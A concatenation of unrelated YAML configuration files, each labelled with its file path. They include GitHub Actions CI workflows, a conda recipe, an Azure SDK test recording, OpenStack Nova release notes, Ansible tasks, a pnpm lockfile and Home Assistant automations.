viewing them as\nrelated points in landscape rather than as isolated phenomena.
The code derives from the ICFP 2018 paper\n[\"Build Systems à la Carte\"](https://github.com/snowleopard/build-systems/releases/download/icfp-submission/build-systems.pdf).\n\n##
Getting Started\n\nYou may be interested to:\n\n* Run `stack test` to execute all
the provided build systems on a very simple example.\n* Run `stack haddock` to generate
HTML documentation of all the interfaces.\n* Read the code, particularly [System.hs](src/Build/System.hs)
which is the concrete implementation of\n all build systems. Following the imports
(or the\n [Haddock documentation](https://hackage.haskell.org/package/build)) will
lead you to all the\n constituent parts.\n\n## Further Activities\n\nThere aren't
really any. The code served as a proving ground for ideas, and its existence both
allows\nconfirmation that our conclusions are valid, and opportunity to cheaply
conduct further experiments. Although\nthe code is a useful adjoint to the paper,
it is not essential to it (other than we wouldn't have been\nable to discover what
we did without an executable specification).\n\n## Background Information\n\nThe
task abstraction is explored more completely in\n[this blog post](https://blogs.ncl.ac.uk/andreymokhov/the-task-abstraction/),
and the motivation behind\nthe project in [an earlier blog post](https://blogs.ncl.ac.uk/andreymokhov/cloud-and-dynamic-builds/).\n"
license-name: MIT
|
packages/bu/build.yaml
|
name: Proto
on:
push:
branches:
- master
pull_request:
branches:
- master
jobs:
generate:
name: Generate
runs-on: ubuntu-latest
steps:
- name: Release
id: release
uses: GoogleCloudPlatform/release-please-action@v3
with:
release-type: go
bump-minor-pre-major: true
bump-patch-for-minor-pre-major: true
pull-request-title-pattern: "release: ${version}"
- name: Checkout
uses: actions/checkout@v3
- name: Checkout PB
uses: actions/checkout@v3
if: ${{ github.event_name != 'pull_request' }}
with:
repository: go-sdk/pb
path: pb
token: ${{ secrets.PAGE_PAT }}
- name: Backup
if: ${{ github.event_name != 'pull_request' }}
run: mv pb/.git git_bak
- name: Cache
uses: actions/cache@v2
with:
path: |
~/.cache/buf
~/.cache/go-build
~/go/pkg/mod
key: ${{ runner.os }}-cache-${{ hashFiles('**/buf.lock') }}
- name: Go
uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Buf
uses: bufbuild/buf-setup-action@main
with:
github_token: ${{ github.token }}
- name: Buf Generate
run: make pb
- name: Restore
if: ${{ github.event_name != 'pull_request' }}
run: |
cd pb
mv ../git_bak .git
git config user.name github-actions[bot]
git config user.email 41898282+github-actions[bot]@<EMAIL>
- name: Version
if: ${{ steps.release.outputs.release_created }}
run: |
version=v${{ steps.release.outputs.major }}.${{ steps.release.outputs.minor }}.${{ steps.release.outputs.patch }}
echo "PB_VERSION=$version" >> $GITHUB_ENV
sed -i "s|dev|$version|g" pb/version.go
- name: Commit
if: ${{ github.event_name != 'pull_request' }}
run: |
cd pb
git add -A
git commit -m "proto: ${{ github.event.head_commit.message }}"
git push -u origin master
- name: Create Tag
if: ${{ steps.release.outputs.release_created }}
run: |
cd pb
echo "new tag ${{ env.PB_VERSION }}"
git tag "${{ env.PB_VERSION }}"
git push origin "${{ env.PB_VERSION }}"
- name: Create Release
if: ${{ steps.release.outputs.release_created }}
run: |
curl -s -o /dev/null -X POST -H 'Authorization: token ${{ secrets.PAGE_PAT }}' -d '{"tag_name":"${{ env.PB_VERSION }}","name":"${{ env.PB_VERSION }}"}' -w "%{http_code}" https://api.github.com/repos/go-sdk/pb/releases
|
.github/workflows/proto.yml
|
{% set name = "km3pipe" %}
{% set version = "9.9.2" %}
package:
name: {{ name|lower }}
version: {{ version }}
source:
url: https://pypi.io/packages/source/{{ name[0] }}/{{ name }}/km3pipe-{{ version }}.tar.gz
sha256: 64458c2b34831c778f9d605b4f3b16c8b0d450afd65e71b17afba40dc2f0d3b1
build:
number: 0
noarch: python
entry_points:
- km3pipe=km3pipe.cmd:main
- pipeinspector=pipeinspector.app:main
- h5extract=km3pipe.utils.h5extract:main
- h5extractf=km3pipe.utils.h5extractf:main
- h5info=km3pipe.utils.h5info:main
- h5tree=km3pipe.utils.h5tree:main
- h5header=km3pipe.utils.h5header:main
- ztplot=km3pipe.utils.ztplot:main
- k40calib=km3pipe.utils.k40calib:main
- triggermap=km3pipe.utils.triggermap:main
- nb2sphx=km3pipe.utils.nb2sphx:main
- ligiermirror=km3pipe.utils.ligiermirror:main
- qrunprocessor=km3pipe.utils.qrunprocessor:main
- qrunqaqc=km3pipe.utils.qrunqaqc:main
- daqsample=km3pipe.utils.daqsample:main
- tres=km3pipe.utils.tres:main
script: {{ PYTHON }} -m pip install . -vv
requirements:
host:
- pip
- python >=3.6
- setuptools_scm
run:
- awkward >=1.4
- docopt
- h5py
- km3db >=0.6.0
- km3io >=0.20.0
- matplotlib-base >=3.0.0
- numba >=0.49.0
- numpy >=1.17.0
- particle >=0.8.0
- passlib
- python >=3.6
- requests
- setuptools >=40.6.2
- setuptools-scm
- pytables >=3.4.2
- thepipe >=1.3.5
- toml
- tqdm
- urwid
test:
imports:
- km3modules
- km3pipe
commands:
- pip check
- km3pipe --help
- pipeinspector --help
- h5extract --help
- h5extractf --help
- h5info --help
- h5tree --help
- h5header --help
- ztplot --help
- k40calib --help
- triggermap --help
- nb2sphx --help
- ligiermirror --help
- qrunprocessor --help
- qrunqaqc --help
- daqsample --help
- tres --help
requires:
- pip
about:
home: http://git.km3net.de/km3py/km3pipe
summary: An analysis framework for KM3NeT
license: MIT
license_file: LICENSE
extra:
recipe-maintainers:
- tamasgal
|
recipe/meta.yaml
|
name: 'Build Docker Image'
description: 'Builds and Pushes Docker Images with some Keptn Internals'
inputs:
IMAGE_NAME:
description: Image Name, e.g., keptn/some-service or keptn-contrib/some-service
required: true
DOCKER_FOLDER:
description: In case you are trying to build from a subfolder, set this to the subfolder (must end in a trailing slash)
default: './'
VERSION:
description: Semantic version used as the tag of the docker image
required: true
DATETIME:
description: Optional datetime for the tag of the docker image (will be set automatically if left empty)
default: unset
FILE:
description: Optional name of the Dockerfile
default: 'Dockerfile'
runs:
using: composite
steps:
- shell: bash
id: check_datetime
env:
DATETIME: ${{ inputs.DATETIME }}
run: |
if [[ "$DATETIME" == "unset" ]] || [[ "$DATETIME" == "" ]]; then
# generate datetime
echo Generating datetime using date command
echo "::set-output name=DATETIME::$(date +'%Y%m%d')$(date +'%H%M')"
else
# use provided datetime
echo Using provided datetime $DATETIME
echo "::set-output name=DATETIME::${DATETIME}"
fi
- shell: bash
id: check_docker_folder
env:
DOCKER_FOLDER: ${{ inputs.DOCKER_FOLDER }}
run: |
# ensure trailing slash in folder
if [[ "${DOCKER_FOLDER}" != */ ]]; then
echo "::error Please ensure that FOLDER has a trailing slash, e.g., ./ or api/"
exit 1
fi
- shell: bash
id: prepare_manifest
name: Prepare Build Manifest
env:
DOCKER_FOLDER: ${{ inputs.DOCKER_FOLDER }}
DATETIME: ${{ steps.check_datetime.outputs.DATETIME }}
run: |
${{ github.action_path }}/docker/writeManifest.sh ${{ github.action_path }}/docker/MANIFEST
cat ${{ github.action_path }}/docker/MANIFEST
# copy manifest
cp ${{ github.action_path }}/docker/MANIFEST ./${DOCKER_FOLDER}MANIFEST
if [[ $? -ne 0 ]]; then
echo "::error Could not find MANIFEST"
exit 1
fi
# copy entrypoint script
cp ${{ github.action_path }}/docker/entrypoint.sh ./${DOCKER_FOLDER}entrypoint.sh
- shell: bash
id: composite-action-build-docker-image
env:
IMAGE_NAME: ${{ inputs.IMAGE_NAME }}
DOCKER_FOLDER: ${{ inputs.DOCKER_FOLDER }}
VERSION: ${{ inputs.VERSION }}
DATETIME: ${{ steps.check_datetime.outputs.DATETIME }}
FILE: ${{ inputs.FILE }}
run: ${{ github.action_path }}/build_docker_image.sh "${IMAGE_NAME}" "${DOCKER_FOLDER}" "${VERSION}" "${DATETIME}" "${FILE}"
|
action.yml
|
---
version: 1
rwmutex: {}
interactions:
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:/aMWaS2dFJEZNJGcSuViOUfzPef2ZUpgeD3U92j/Hwg=
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo?restype=container
method: PUT
response:
body: ""
headers:
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Etag:
- '"0x8D47C73B9F9B36A"'
Last-Modified:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2c6a-0001-00d8-685c-aea568000000
X-Ms-Version:
- 2016-05-31
status: 201 Created
code: 201
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:<KEY>
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo/blob/138storageblobsuitetestgetblobproperties
method: HEAD
response:
body: ""
headers:
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2c8d-0001-00d8-075c-aea568000000
X-Ms-Version:
- 2016-05-31
status: 404 The specified blob does not exist.
code: 404
- request:
body: Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:<KEY>
Content-Length:
- "64"
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Blob-Type:
- BlockBlob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo/blob/238storageblobsuitetestgetblobproperties
method: PUT
response:
body: ""
headers:
Content-Md5:
- k5xcYcwrRU0Jp851wBBhJg==
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Etag:
- '"0x8D47C73B9F3A49E"'
Last-Modified:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2cad-0001-00d8-235c-aea568000000
X-Ms-Request-Server-Encrypted:
- "false"
X-Ms-Version:
- 2016-05-31
status: 201 Created
code: 201
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golang<PASSWORD>:<KEY>
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo/blob/238storageblobsuitetestgetblobproperties
method: HEAD
response:
body: ""
headers:
Accept-Ranges:
- bytes
Content-Length:
- "64"
Content-Md5:
- k5xcYcwrRU0Jp851wBBhJg==
Content-Type:
- application/octet-stream
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Etag:
- '"0x8D47C73B9F3A49E"'
Last-Modified:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Blob-Type:
- BlockBlob
X-Ms-Lease-State:
- available
X-Ms-Lease-Status:
- unlocked
X-Ms-Request-Id:
- 5eac2cca-0001-00d8-3d5c-aea568000000
X-Ms-Server-Encrypted:
- "false"
X-Ms-Version:
- 2016-05-31
status: 200 OK
code: 200
- request:
body: ""
form: {}
headers:
Authorization:
- SharedKey golangrocksonazure:xd4tWwfwPL5s9t3qRWG4jEOb7ftlL/J2J6XjCurknUk=
User-Agent:
- Go/go1.8 (amd64-windows) azure-storage-go/0.1.0 api-version/2016-05-31 blob
X-Ms-Date:
- Wed, 05 Apr 2017 22:33:05 GMT
X-Ms-Version:
- 2016-05-31
url: https://golangrocksonazure.blob.core.windows.net/cnt-38storageblobsuitetestgetblo?restype=container
method: DELETE
response:
body: ""
headers:
Date:
- Wed, 05 Apr 2017 22:33:04 GMT
Server:
- Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
X-Ms-Request-Id:
- 5eac2cda-0001-00d8-4c5c-aea568000000
X-Ms-Version:
- 2016-05-31
status: 202 Accepted
code: 202
|
vendor/github.com/Azure/azure-sdk-for-go/storage/recordings/StorageBlobSuite/TestGetBlobProperties.yaml
|
name: Tests
on: [push, pull_request]
jobs:
isort:
name: Check imports order
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Setup python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Run isort
uses: isort/isort-action@master
with:
configuration: "."
- uses: stefanzweifel/git-auto-commit-action@v4
name: autocommit
with:
commit_message: ":construction_worker: Sort imports"
black_formatter:
name: Run Black formatter
runs-on: ubuntu-latest
needs: [isort]
steps:
- uses: actions/checkout@v2
- name: Check files with black formatter
uses: rickstaa/action-black@v1
id: action_black
with:
black_args: "."
- uses: stefanzweifel/git-auto-commit-action@v4
name: autocommit
with:
commit_message: ":construction_worker: Automated Commit"
flake8_linter:
name: Flake8 linter
runs-on: ubuntu-latest
needs: [black_formatter]
steps:
- uses: actions/checkout@v3
- name: Setup python environment.
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Pull modifications
run: git pull
- name: Check files with flake8 linter
uses: py-actions/flake8@v2
with:
ignore: "F401"
max-line-length: "100"
path: "src" # tests ??
mypy_type_check:
name: MyPy type checking
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Setup python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Install dependencies
run: |
pip install -r requirements.txt
- name: MyPy
run: |
mypy src/
tests:
name: Run tests with PyTest library
strategy:
matrix:
os: [ubuntu-latest, windows-latest, macos-latest]
runs-on: ${{ matrix.os }}
needs: [black_formatter, flake8_linter, mypy_type_check]
steps:
- uses: actions/checkout@v3
- name: Setup python 3.10
uses: actions/setup-python@v3
with:
python-version: "3.10"
- name: Install dependencies
run: |
pip install -r requirements.txt
- name: Run tests
run: |
python -m pytest --cov=./ --cov-report=xml
- name: Upload coverage to Codecov
uses: codecov/codecov-action@v2
with:
token: ${{ secrets.CODECOV_TOKEN }}
directory: ./coverage/reports/
env_vars: OS,PYTHON
fail_ci_if_error: true
files: ./coverage.xml
flags: unittests
name: codecov-umbrella
verbose: true
|
.github/workflows/workflow.yml
|
---
prelude: |
The 20.0.0 release includes many new features and bug fixes. Please be
sure to read the upgrade section which describes the required actions to
upgrade your cloud from 19.0.0 (Stein) to 20.0.0 (Train).
There are a few major changes worth mentioning. This is not an exhaustive
list:
- The latest Compute API microversion supported for Train is v2.79. Details
on REST API microversions added since the 19.0.0 Stein release can be
found in the `REST API Version History`_ page.
- Live migration support for servers with a
`NUMA topology, pinned CPUs <https://docs.openstack.org/nova/latest/admin/cpu-topologies.html>`_
and/or `huge pages <https://docs.openstack.org/nova/latest/admin/huge-pages.html>`_,
when using the libvirt compute driver.
- Live migration support for servers with
`SR-IOV ports <https://docs.openstack.org/neutron/latest/admin/config-sriov>`_
attached when using the libvirt compute driver.
- Support for cold migrating and resizing servers with bandwidth-aware
`Quality of Service ports <https://docs.openstack.org/api-guide/compute/port_with_resource_request.html>`_
attached.
- Improvements to the scheduler for more intelligently filtering
`results from the Placement service <https://docs.openstack.org/nova/latest/admin/configuration/schedulers.html#prefiltering>`_.
- Improved multi-cell resilience with the ability to
`count quota usage <https://docs.openstack.org/nova/latest/user/quotas.html#quota-usage-from-placement>`_
using the Placement service and API database.
- A new framework supporting hardware-based encryption of guest memory
to protect users against attackers or rogue administrators snooping on
their workloads when using the libvirt compute driver. Currently only has
basic support for
`AMD SEV (Secure Encrypted Virtualization) <https://docs.openstack.org/nova/latest/admin/configuration/hypervisor-kvm.html#amd-sev-secure-encrypted-virtualization>`_.
- Improved `operational tooling <https://docs.openstack.org/nova/latest/cli/nova-manage.html>`_
for things like archiving the database and healing instance resource
allocations in Placement.
- Improved coordination with the baremetal service during external node
`power cycles <https://docs.openstack.org/ironic/latest/admin/power-sync.html>`_.
- Support for
`VPMEM (Virtual Persistent Memory) <https://docs.openstack.org/nova/latest/admin/virtual-persistent-memory.html>`_
when using the libvirt compute driver. This provides data persistence
across power cycles at a lower cost and with much larger capacities than
DRAM, especially benefitting HPC and memory databases such as redis,
rocksdb, oracle, SAP HANA, and Aerospike.
- It is now possible to place CPU pinned and unpinned servers on the same
compute host when using the libvirt compute driver. See the
`admin guide <https://docs.openstack.org/nova/latest/admin/cpu-topologies.html#configuring-libvirt-compute-nodes-for-cpu-pinning>`_
for details.
- Nova no longer includes Placement code. You must use the extracted
Placement service. See the `Placement extraction upgrade instructions`_
for details.
- The XenAPI virt driver is now deprecated and may be removed in a future
release as its quality can not be ensured due to lack of maintainers.
- The ``nova-consoleauth`` service has been removed as it was deprecated
since the 18.0.0 (Rocky) release.
- The deprecated ``Cells V1`` feature (not to be confused with `Cells V2`_)
has been removed.
.. _REST API Version History: https://docs.openstack.org/nova/latest/reference/api-microversion-history.html
.. _Placement extraction upgrade instructions: https://docs.openstack.org/placement/latest/upgrade/to-stein.html
.. _Cells V2: https://docs.openstack.org/nova/latest/user/cells.html
|
releasenotes/notes/train-prelude-3db0f5f6a75cc57a.yaml
|
- name: Create {{ bigip_namespace }} namespace
k8s:
state: present
definition:
apiVersion: v1
kind: Namespace
metadata:
name: "{{ bigip_namespace }}"
- name: Create bridges and network
include_tasks: 41_bigip_bridge_network.yml
- name: Create data volume for VMs
include_tasks: 42_bigip_data_volume.yml
- name: Setup BIGIP mgmt VLAN in provisioner
include_tasks: 43_provisioner_network.yml
- name: Create BIGIP VMs
include_tasks: 45_bigip_vm.yml
- name: Add all bigip hosts to inventory
add_host:
hostname: "{{ item.key }}.{{ bigip_base_domain }}"
ansible_host: "{{ item.value.mgmt_ip | ipaddr('address') }}"
license_key: "{{ item.value.license_key }}"
bigip_user: "{{ bigip_user }}"
bigip_password: "{{ <PASSWORD> }}"
bigip_base_domain: "{{ bigip_base_domain }}"
groups:
- 'bigip'
loop: "{{ bigip_vms | dict2items }}"
- name: Generate stablcurco1_dns46.tcl
template:
src: stablcurco1_dns46.tcl.j2
dest: "/tmp/stablcurco1_dns46.tcl"
- name: Generate stablcurco1_nat46.tcl
copy:
src: stablcurco1_nat46.tcl
dest: "/tmp/stablcurco1_nat46.tcl"
- block:
- name: detect python interpreter
shell: |
/usr/bin/python --version
register: python_version
ignore_errors: true
delegate_to: localhost
- name: set python version
shell: |
{{ (python_version.stderr_lines|length > 0 and 'Python' in python_version.stderr) | ternary('/usr/bin/python', '/usr/libexec/platform-python') }} --version | awk '{print $2}'
register: python_version
become: true
delegate_to: localhost
- name: Install required packages
yum:
name: "patch"
state: present
update_cache: true
disable_gpg_check: yes
become: true
delegate_to: localhost
- name: install galaxy module
shell: "ansible-galaxy collection install ansible.posix"
become: true
delegate_to: localhost
- name: Patch ansible module
patch:
src: "{{ role_path }}/files/bigip_device_license-{{ python_version.stdout.split('.')[0] }}.{{ python_version.stdout.split('.')[1] }}.patch"
dest: "/usr/lib/python{{ python_version.stdout.split('.')[0] }}.{{ python_version.stdout.split('.')[1] }}/site-packages/ansible/modules/network/f5/bigip_device_license.py"
become: true
delegate_to: localhost
when:
- bigip_module_patch | default(true) | bool
# - name: Set MCP {{ bigip_worker_mcp }} MaxUnavailable to default 1
# shell: |
# oc patch mcp {{ bigip_worker_mcp }} --type='merge' --patch="{\"spec\":{\"maxUnavailable\": 1 }}"
|
ansible/roles/bigip-ingress-setup/tasks/40_bigip_setup.yml
|
dependencies:
'@sane-fmt/wasm32-wasi': 0.7.0
'@tools/places': 'link:../places'
exec-inline: 0.0.5
lockfileVersion: 5.2
packages:
/@sane-fmt/wasm32-wasi/0.7.0:
dependencies:
'@types/node': 13.13.15
'@wasmer/wasi': 0.11.2
tslib: 2.0.0
dev: false
hasBin: true
resolution:
integrity: sha512-QtQ6JhPfRRmMT38Gt1WiU+hK4ClVuFGX1nbcsiIANav/S3slm1K4SC337a87tPEZDKrwFoODrZ5DwQeAxbQKyA==
/@types/node/13.13.15:
dev: false
resolution:
integrity: sha512-kwbcs0jySLxzLsa2nWUAGOd/s21WU1jebrEdtzhsj1D4Yps1EOuyI1Qcu+FD56dL7NRNIJtDDjcqIG22NwkgLw==
/@wasmer/wasi/0.11.2:
dependencies:
browser-process-hrtime: 1.0.0
buffer-es6: 4.9.3
path-browserify: 1.0.1
randomfill: 1.0.4
dev: false
resolution:
integrity: sha512-9Oi68ZsD8HTZRjWj5VvnhN0dLL6nSacrgGvdwJeHd9q5bMrlFaXTckQAYm84zXJWg+b5yeFhaEZqGEhe7q4VFQ==
/browser-process-hrtime/1.0.0:
dev: false
resolution:
integrity: sha512-9o5UecI3GhkpM6DrXr69PblIuWxPKk9Y0jHBRhdocZ2y7YECBFCsHm79Pr3OyR2AvjhDkabFJaDJMYRazHgsow==
/buffer-es6/4.9.3:
dev: false
resolution:
integrity: sha1-8mNHuC33b9N+GLy1KIxJcM/VxAQ=
/exec-inline/0.0.5:
dependencies:
'@types/node': 13.13.15
tslib: 1.13.0
dev: false
engines:
node: '>= 8.9.0'
resolution:
integrity: sha512-g7eEPrhCbkBJoYb8PG4aZeRXog1HYptBNNfwN1bRmzYWtu5dNQniqcmwClBhb6YWg3X/wrOnzmKJSPUbZYsKJg==
/path-browserify/1.0.1:
dev: false
resolution:
integrity: sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==
/randombytes/2.1.0:
dependencies:
safe-buffer: 5.2.1
dev: false
resolution:
integrity: sha512-vYl3iOX+4CKUWuxGi9Ukhie6fsqXqS9FE2Zaic4tNFD2N2QQaXOMFbuKK4QmDHC0JO6B1Zp41J0LpT0oR68amQ==
/randomfill/1.0.4:
dependencies:
randombytes: 2.1.0
safe-buffer: 5.2.1
dev: false
resolution:
integrity: sha512-87lcbR8+MhcWcUiQ+9e+Rwx8MyR2P7qnt15ynUlbm3TU/fjbgz4GsvfSUDTemtCCtVCqb4ZcEFlyPNTh9bBTLw==
/safe-buffer/5.2.1:
dev: false
resolution:
integrity: sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==
/tslib/1.13.0:
dev: false
resolution:
integrity: sha512-<KEY>==
/tslib/2.0.0:
dev: false
resolution:
integrity: sha512-lTqkx847PI7xEDYJntxZH89L2/aXInsyF2luSafe/+0fHOMjlBNXdH6th7f70qxLDhul7KZK0zC8V5ZIyHl0/g==
specifiers:
'@sane-fmt/wasm32-wasi': ^0.7.0
'@tools/places': 'file:../places'
exec-inline: ^0.0.5
|
tools/sane-fmt/pnpm-lock.yaml
|
#scenarie for å starte dagen
- alias: '<NAME>'
trigger:
platform: time
at: '07:00'
action:
- service: homeassistant.turn_off
entity_id: group.underetasjen
- service: homeassistant.turn_on
entity_id: group.gangogsov
- service: homeassistant.turn_on
entity_id: light.skatollet
- service: homeassistant.turn_on
entity_id: switch.bildelys
- service: light.turn_on
entity_id: light.level
data:
brightness: 40
#scenarie der folk er hjemme og solen er gått ned
- alias: 'Ettermiddag, er hjemme'
trigger:
- platform: sun
event: sunset
offset: '-02:00:00'
- platform: state
entity_id: alarm_control_panel.sector_alarm_01166457
to: 'disarmed'
condition:
- condition: state
entity_id: alarm_control_panel.sector_alarm_01166457
state: 'disarmed'
- condition: time
after: '14:00:00'
before: '22:59:00'
action:
- service: homeassistant.turn_on
entity_id: group.underetasjen
data:
brightness: 90
- service: homeassistant.turn_on
entity_id: group.stuen
- service: light.turn_on
entity_id: light.level
data:
brightness: 25
#scenarie der folk ikke er hjemme og solen er gått ned
- alias: 'Ettermiddag, stille i huset'
hide_entity: True
trigger:
- platform: sun
event: sunset
condition:
- condition: state
entity_id: alarm_control_panel.sector_alarm_01166457
state: 'armed_away'
action:
- service: homeassistant.turn_on
entity_id: group.stuen
- service: light.turn_on
entity_id: light.level
data:
brightness: 15
# scenarie for stille i huset
- alias: 'Natt og dag'
trigger:
- platform: time
at: '08:30'
- platform: time
at: '23:00'
action:
- service: homeassistant.turn_off
entity_id: group.underetasjen
- service: homeassistant.turn_off
entity_id: group.stuen
- service: homeassistant.turn_off
entity_id: group.gangogsov
- service: light.turn_on
entity_id: light.level
data:
brightness: 15
#varsler når det er bevegelse på hjemmekontor og alarmen er på
- alias: 'Alarm på og bevegelse, varsling'
hide_entity: True
trigger:
- platform: state
entity_id: binary_sensor.sensor
to: 'on'
condition:
- condition: state
entity_id: alarm_control_panel.sector_alarm_01166457
state: 'armed_home'
action:
- service: light.turn_on
entity_id: light.hue_iris
data:
brightness: 80
rgb_color: [255, 0, 0]
- service: notify.pushover
data:
title: "Bevegelse på hjemmekontor"
message: "Alarm på, bevegelse på hjemmekontor"
data:
# url: "https://www.home-assistant.io/"
# sound: pianobar
priority: 0
#varsler når ny device legges til
- alias: 'Ny enhet'
hide_entity: True
trigger:
- platform: event
event_type: device_tracker_new_device
# condition:
action:
- service: notify.pushover
data_template:
title: Ny enhet på nettverket
message: >
Ny enhet:
{{trigger.event.data.host_name}}
({{trigger.event.data.entity_id}})
#varsler når ny magnetsensor1 trigges
- alias: 'Magnetsensor1'
hide_entity: True
trigger:
- platform: state
entity_id: binary_sensor.sensor_2
to: 'on'
# condition:
action:
- service: notify.pushover
data_template:
title: Magnetsensor 1 er åpnet
message: >
Ny enhet:
#varsler når ny magnetsensor1 trigges
- alias: 'Magnetsensor2'
hide_entity: True
trigger:
- platform: state
entity_id: binary_sensor.sensor_3
to: 'on'
# condition:
action:
- service: notify.pushover
data_template:
title: Magnetsensor 2 er åpnet
message: >
Ny enhet:
|
automations.yaml
|
- set_fact:
internal_postgres: "{{ V4_CFG_POSTGRES_SERVERS.default.internal }}"
tags:
- install
- uninstall
- update
- name: postgres - gcp cloud-sql-proxy
include_tasks: gcp-cloud-sql-proxy.yaml
vars:
role: "{{ item.key }}"
settings: "{{ item.value }}"
with_dict: "{{ V4_CFG_POSTGRES_SERVERS }}"
when:
- not item.value.internal
- "'service_account' in item.value"
- item.value.service_account is defined
- V4_CFG_CLOUD_SERVICE_ACCOUNT_NAME is defined
- PROVIDER == "gcp"
tags:
- install
- uninstall
- update
- name: postgres - pre 2021.1.4
block:
- name: postgres - internal
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { resources: "overlays/internal-postgres" }
- { resources: "overlays/crunchydata" }
- { transformers: "overlays/internal-postgres/internal-postgres-transformer.yaml" }
- { transformers: "postgres-storage-transformer.yaml", vdm: true, max: "2020.1.3" }
- { transformers: "postgres-storage-transformer.v2.yaml", vdm: true, min: "2020.1.3"}
when:
- internal_postgres
- name: postgres - external
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { transformers: "overlays/external-postgres/external-postgres-transformer.yaml" }
- { generators: "postgres-sas-user.yaml", vdm: true }
- { generators: "sas-go-config.yaml", vdm: true }
- { generators: "sas-postgres-config.yaml", max: "2020.0.4", vdm: true }
- { generators: "sas-postgres-config.v2.yaml", min: "2020.0.5", vdm: true }
when:
- not internal_postgres
when:
- V4_CFG_CADENCE_VERSION is version('2021.1.4', "<")
- V4_CFG_CADENCE_NAME != "fast"
tags:
- install
- uninstall
- update
- name: postgres - post 2021.1.4
block:
- name: postgres - internal
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { transformers: "postgres-storage-transformer.v3.yaml", vdm: true }
when:
- internal_postgres
- name: postgres - external
overlay_facts:
cadence_name: "{{ V4_CFG_CADENCE_NAME }}"
cadence_number: "{{ V4_CFG_CADENCE_VERSION }}"
existing: "{{ vdm_overlays }}"
add:
- { transformers: "overlays/external-postgres/external-postgres-transformer.yaml" }
when:
- not internal_postgres
- name: postgres - instance
include_tasks: postgres-instance.yaml
vars:
role: "{{ item.key }}"
settings: "{{ item.value }}"
internal: "{{ internal_postgres }}"
with_dict: "{{ V4_CFG_POSTGRES_SERVERS }}"
when:
- V4_CFG_CADENCE_VERSION is version('2021.1.4', ">=") or V4_CFG_CADENCE_NAME == "fast"
tags:
- install
- uninstall
- update
|
roles/vdm/tasks/postgres/postgres.yaml
|
name: Build, Test Binaries, & Release
on: [push, pull_request]
defaults:
run:
shell: bash -l {0}
jobs:
build-and-release:
runs-on: ${{ matrix.os }}
strategy:
max-parallel: 4
fail-fast: false
matrix:
os: [macos-latest, windows-latest]
node-version: [14.x]
steps:
- name: Checkout repository
uses: actions/checkout@v2
with:
fetch-depth: 0 # fetch complete history
- name: Fetch git tags
run: git fetch origin +refs/tags/*:refs/tags/*
- name: Install Node.js
uses: actions/setup-node@v2
with:
node-version: ${{ matrix.node-version }}
- name: Install Dependencies
run: |
yarn config set network-timeout 600000 -g
yarn install --verbose
- name: Fetch InVEST Binaries
run: yarn run fetch-invest
- name: Run the build script
run: yarn run build
# Steps that use github secrets do not run in pull requests.
# These include codesigning & GCS deploy-related things.
- name: Set up Python for gsutil
# gsutil requires a python, which is not included on Windows
if: github.event_name != 'pull_request' && matrix.os == 'windows-latest'
uses: actions/setup-python@v2
with:
python-version: 3.7
- name: Set up GCP
